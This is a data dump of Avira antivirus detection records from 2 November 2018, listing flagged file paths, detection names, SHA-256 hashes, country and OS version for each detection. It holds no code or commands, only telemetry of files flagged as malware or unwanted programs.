  Row(detection=Row(filename='avscan-20181102-151621-b6bc64da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae15aaa\\AVSCAN-20181102-151239-915D24CF\\AVSCAN-20181102-151621-B6BC64DA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134304-8b50e21b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134304-8B50E21B', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214627-8471daf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-214348-640D9348\\AVSCAN-20181102-214627-8471DAF1', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113035-689f8178', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82a383a1\\AVSCAN-20181102-112937-623D848E\\AVSCAN-20181102-113035-689F8178', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6468.22483\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6468.22483\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:12:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155229-36515af9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155229-36515AF9', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231451-2c1974b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a324cd\\AVSCAN-20181102-231211-13EC6DC1\\AVSCAN-20181102-231451-2C1974B3', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:14:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sylenth1_setup.exe', filepath='D:\\Data\\My.Software\\Audio\\VST\\Lennar Digital\\Lennardigital Sylenth1 VSTi v2.2\\Sylenth1_setup.exe', filesize=24192000, name='TR/Agent.24192000.#M1.#R1'), hash='6ffc5fab6a631c07fa4727becfc59073926fd02bf3f94e8e603083b32b19ba13', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:36:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=1800000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='72bb0d80045cbb04168175aad4f39ccbd437fa0ef271b512948fc9121e16b6dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T08:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='58403573bba805b20876d3ae302b6bd91ce2c5431bf16cac456ad2664f148905', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\58403573BBA805B20876D3AE302B6BD91CE2C5431BF16CAC456AD2664F148905', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='58403573bba805b20876d3ae302b6bd91ce2c5431bf16cac456ad2664f148905', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:07:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145817-3c1c5b35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145817-3C1C5B35', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\ClipBoardSvc\\MSieXEc64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T16:44:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100233-bc59c4c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100148-B6DD3C51\\AVSCAN-20181102-100233-BC59C4C6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083631-28ada35e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d84ba8\\AVSCAN-20181102-083508-1EFCDAA9\\AVSCAN-20181102-083631-28ADA35E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:36:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='549a129edf8e1b2dcf657cd8495702ce9fee17d4bbd13188a4f5928b5cc34f30', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055701-167b8ebf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055701-167B8EBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052816-1263761b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052816-1263761B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054236-12c9af2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054236-12C9AF2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142431-c3a43266', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142431-C3A43266', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wsbcff6641-cea1-4517-8e9f-308cf3da2307.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Common Files\\Adobe\\Help\\he_IL\\Bridge\\2.0\\WSBCFF6641-CEA1-4517-8E9F-308CF3DA2307.html', filesize=4000, name='W32/Chir.B.#M1.#R1'), hash='709f3d067ed384877356cf70e10b3a1ffa07039ddf7c14b08c170b0840cb7341', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051931-d90ca13f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051931-D90CA13F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130538-5439cb31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130538-5439CB31', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055637-07d3178f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055637-07D3178F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084403-5dc99d9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d84ba8\\AVSCAN-20181102-084258-5627AE86\\AVSCAN-20181102-084403-5DC99D9A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:44:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:46:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125057-b0ad1cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125057-B0AD1CCE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:54:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053228-a84822b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053228-A84822B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pandroidmtkimei.dll', filepath='g:\\ســــــــــــــــــــــــــوفـت\\بوكسات\\فلكانو جديد 4 -2016\\PAndroidMtkImei.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='6bc8424417620ad92382606fcf58065d2029aa94b6eee2616a5f391c53091ef9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061025-f5524a06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061025-F5524A06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061719-ec09b5fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061719-EC09B5FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052830-1a386973', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052830-1A386973', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062452-fa7b6d2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062452-FA7B6D2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060847-bafef21c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060847-BAFEF21C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060347-08240d66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060347-08240D66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054608-915aabfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054608-915AABFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052631-d39ff5ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052631-D39FF5AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052452-98511b10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052452-98511B10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050920-6ce0f7af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050920-6CE0F7AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053023-5e1f48e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053023-5E1F48E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062001-4ca71ea8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062001-4CA71EA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055518-d9070315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055518-D9070315', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062014-54d082b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062014-54D082B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060524-4225291b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060524-4225291B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052041-02b34e79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052041-02B34E79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:39Z'), dt=datetime.date(2018, 11, 2)),
